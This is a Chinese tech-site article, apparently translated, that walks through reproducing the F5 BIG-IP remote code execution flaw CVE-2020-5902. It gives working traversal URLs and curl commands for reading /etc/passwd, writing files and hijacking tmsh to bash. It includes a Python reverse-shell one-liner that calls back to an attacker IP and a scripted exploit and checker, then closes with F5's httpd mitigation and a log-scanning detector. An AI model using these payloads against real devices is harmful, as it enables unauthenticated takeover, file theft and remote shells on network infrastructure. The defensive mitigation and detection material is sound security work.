2025-04-01 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article shows how to reproduce the F5 BIG-IP remote code execution vulnerability CVE-2020-5902. The steps are described in detail; readers who are interested can follow along.
0x00 Introduction
F5 BIG-IP is an application delivery platform that integrates traffic management, DNS, inbound and outbound rules, web application firewall, web gateway, load balancing and other functions. A remote code execution vulnerability exists in the Traffic Management User Interface (TMUI), also called the Configuration utility, of F5 BIG-IP. An unauthenticated attacker who can reach the TMUI can bypass its authentication and use all of its functions, including undocumented ones: executing arbitrary system commands, reading and writing arbitrary files, enabling or disabling services, and so on.
0x02 Vulnerability overview
An attacker can exploit this vulnerability to execute arbitrary system commands, create or delete files, disable services, execute arbitrary Java code, and finally take full control of the target system through a shell.
0x03 Affected versions
F5 BIG-IP 15.1.0
F5 BIG-IP 15.0.0
F5 BIG-IP 14.1.0 to 14.1.2
F5 BIG-IP 13.1.0 to 13.1.3
F5 BIG-IP 12.1.0 to 12.1.5
F5 BIG-IP 11.6.1 to 11.6.5
0x04 Environment setup
1. Register on the F5 website, log in and download the trial version:
https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition
2. Choose any download region and download the image.
3. After the download finishes, import it into VMware:
VMware top-left 'File' -> 'Open', then select the downloaded file.
4. No special configuration is needed; after import the system can be started with the default account root/default. You must change the default password after the first login.
5. Enter config, set the IP address, and press Enter twice.
6. After the IP is set, open the link below; if the login page appears, the installation succeeded. // Note: use https and the configured IP
https://172.16.1.186/tmui/login.jsp
0x05 Vulnerability reproduction
1. The vulnerability is reached through the login page: appending /..;/ after login.jsp satisfies the front-end httpd check for the public login page, while Tomcat collapses that segment and serves the protected workspace pages behind it. First use the PoC to read a test file:
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
2. Write a file
curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=East Tower Network Security Institute" "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
3. Read the file back
curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"
4. Create a tmsh alias so that the harmless list command is hijacked to bash
curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
4.1 Write the file that bash will run
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id
4.2 Execute the file through the hijacked list command
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test
Note: this step could not be completed here because of insufficient permissions; you can try it in a real environment.
5. Reverse shell: write a Python reverse shell to a file
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.16.1.132',<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
(<port> is the port your listener is on; when the command is sent in the query string, the content value must be URL-encoded.)
Start a listener on Kali.
Then run the file through tmshCmd.jsp as in step 4.2 to trigger the reverse shell. // No permission: the reverse shell did not connect back here; you can test it in a real environment.
6. Tools
https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
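The requests from steps 1 to 5 above, collected into one script. This is an added example, not code from the original article, from F5 or from the tools linked under 6: the host 172.16.1.200 is a placeholder taken from the steps above, and SAMPLE_RESPONSE is a constructed fileRead.jsp reply so the helpers can be exercised offline.

```python
"""Request helpers for the CVE-2020-5902 reproduction steps above.

Added example, not code from the original article or from F5. Host values
are placeholders and SAMPLE_RESPONSE is a constructed fileRead.jsp reply,
so the module can be imported and exercised offline.
"""
import re
import ssl
import sys
import urllib.parse
import urllib.request

# The '..;' segment is the whole trick: Apache httpd in front of TMUI only sees
# a request for the public /tmui/login.jsp, while Tomcat behind it treats ';'
# as a path-parameter separator, collapses '/login.jsp/..;' and serves the
# authenticated workspace page instead.
TRAVERSAL = "/tmui/login.jsp/..;/tmui/locallb/workspace/"


def build_url(host, page, params):
    """Build the traversal URL for one workspace page with its query parameters."""
    query = urllib.parse.urlencode(params, safe="/")
    return f"https://{host}{TRAVERSAL}{page}?{query}"


def read_file_url(host, path):
    return build_url(host, "fileRead.jsp", {"fileName": path})


def save_file_url(host, path, content):
    return build_url(host, "fileSave.jsp", {"fileName": path, "content": content})


def tmsh_url(host, command):
    return build_url(host, "tmshCmd.jsp", {"command": command})


def alias_chain(host, script_path, script_body):
    """The three requests of the 'list -> bash' alias trick, in the order sent:
    alias the harmless tmsh 'list' to bash, drop a script, then 'list' it."""
    return [
        tmsh_url(host, "create cli alias private list command bash"),
        save_file_url(host, script_path, script_body),
        tmsh_url(host, f"list {script_path}"),
    ]


# fileRead.jsp wraps the file in a JSON-like 'output' field; a uid-0 root
# entry is an unambiguous sign that /etc/passwd was returned.
PASSWD_RE = re.compile(r"root:[^:]*:0:0:")

# Constructed sample reply, shaped like a real fileRead.jsp response.
SAMPLE_RESPONSE = '{"output":"root:x:0:0:root:/root:/bin/bash\\nbin:x:1:1:bin:/bin:/sbin/nologin\\n"}'


def passwd_leaked(body):
    return PASSWD_RE.search(body) is not None


def fetch(url, timeout=10):
    """GET the URL like 'curl -k': TMUI normally has a self-signed certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode(errors="replace")


def check(host):
    """Return True if the host serves /etc/passwd through the traversal."""
    return passwd_leaked(fetch(read_file_url(host, "/etc/passwd")))


if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    host = args[0] if args else "172.16.1.200"
    for url in alias_chain(host, "/tmp/test", "id"):
        print(url)
    if "--check" in sys.argv:
        print("vulnerable" if check(host) else "not vulnerable")
```

Run it as `python3 poc.py <host>` to print the three alias-chain URLs, or add `--check` to send the /etc/passwd read and evaluate the reply. The URL builders keep `/` unencoded and turn spaces into `+`, so they produce exactly the strings shown in the curl commands above.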
0x06 Remediation advice
1. F5 suggests the following temporary mitigation until the upgrade can be applied:
1.1 Log in to the affected system and enter the tmsh shell:
tmsh
1.2 Edit the configuration of the httpd component:
edit /sys httpd all-properties
1.3 Locate the include section and add the following block (the text published in F5's K52145254 article):
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'
F5 later revised this to <LocationMatch ";"> because a request containing ';' but no '..' slipped past the first pattern; use the current wording from the advisory.
1.4 Save the file: press ESC, then type :wq
1.5 Save the running configuration:
save /sys config
1.6 Restart the httpd service:
restart sys service httpd
Also restrict access to the TMUI so that it is reachable only from trusted management networks, not from external IP addresses.
2. Upgrade to one of the following fixed versions
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
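An added example for the mitigation above (not code from the original article or from F5): it reproduces the two LocationMatch patterns F5 published, checks whether a request path would be answered with 404 under each, and scans httpd access-log lines for the ';' path parameter that every exploitation attempt of this bug needs. The log lines are constructed for this example, with documentation IP ranges.

```python
"""Mitigation and log checks for CVE-2020-5902.

Added example, not code from the original article or from F5. The log lines
are constructed in Combined Log Format with documentation IP ranges; the two
regexes reproduce the patterns F5 published in K52145254.
"""
import re
import urllib.parse

# First version of the F5 httpd mitigation: only '..;' was matched.
LOCATIONMATCH_V1 = re.compile(r".*\.\.;.*")
# Revised version: any ';' in the path. A request such as /hsqldb; carries no
# '..' and slipped past V1, which is why F5 widened the pattern.
LOCATIONMATCH_V2 = re.compile(r";")


def blocked(path, pattern=LOCATIONMATCH_V2):
    """Would <LocationMatch> with this pattern answer the request with 404?
    Apache applies the regex to the percent-decoded path, without the query."""
    return pattern.search(urllib.parse.unquote(path)) is not None


# Minimal Combined Log Format parser: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urllib.parse.unquote(rec["target"].split("?", 1)[0])
    return rec


def suspicious(rec):
    """Flag what the revised mitigation blocks: a ';' path parameter.
    Legitimate TMUI traffic does not use it; exploitation of this bug needs it."""
    return ";" in rec["path"]


def scan(log_text, pattern=LOCATIONMATCH_V2):
    """Return (ip, path, status, would_be_blocked) for every suspicious request,
    so an analyst sees both who tried and whether the mitigation stops them."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and suspicious(rec):
            hits.append((rec["ip"], rec["path"], rec["status"],
                         blocked(rec["path"], pattern)))
    return hits


# Constructed sample: an exploitation sequence from 203.0.113.5, a normal login
# page load, and a ';'-only request of the kind that bypassed the first pattern.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jul/2020:10:12:01 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.68.0"
203.0.113.5 - - [05/Jul/2020:10:12:03 +0000] "POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 58 "-" "curl/7.68.0"
203.0.113.5 - - [05/Jul/2020:10:12:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash HTTP/1.1" 200 91 "-" "curl/7.68.0"
198.51.100.9 - - [05/Jul/2020:10:13:44 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5121 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jul/2020:10:14:10 +0000] "GET /hsqldb;/ HTTP/1.1" 200 2011 "-" "python-requests/2.24"
"""

if __name__ == "__main__":
    for ip, path, status, stopped in scan(SAMPLE_LOG, LOCATIONMATCH_V1):
        print(f"{ip} {status} {'blocked' if stopped else 'NOT blocked'} {path}")
```

Running it against the sample with the first pattern shows the three traversal requests blocked and the ';'-only request passing, which is exactly the gap the revised pattern closes. A status of 200 on a flagged line from before the mitigation was applied means the request reached Tomcat and the host should be treated as compromised.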
That is how the F5 BIG-IP remote code execution vulnerability CVE-2020-5902 is reproduced. I hope the content above is helpful; if you found the article useful, share it so more people can see it.